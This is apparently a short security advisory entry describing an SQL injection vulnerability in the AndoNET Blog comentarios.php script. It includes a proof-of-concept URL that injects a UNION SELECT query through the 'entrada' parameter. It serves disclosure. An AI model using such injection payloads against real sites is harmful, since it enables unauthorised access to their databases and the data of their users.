• info
• discussion
• exploit
• solution
• references

AndoNET Blog Comentarios.PHP SQL Injection Vulnerability


An exploit is not required.

The following proof of concept example is available:

http://www.example.com/adonet/index.php?ando=comentarios&entrada=1'%20union%20select%201,2,3,4/*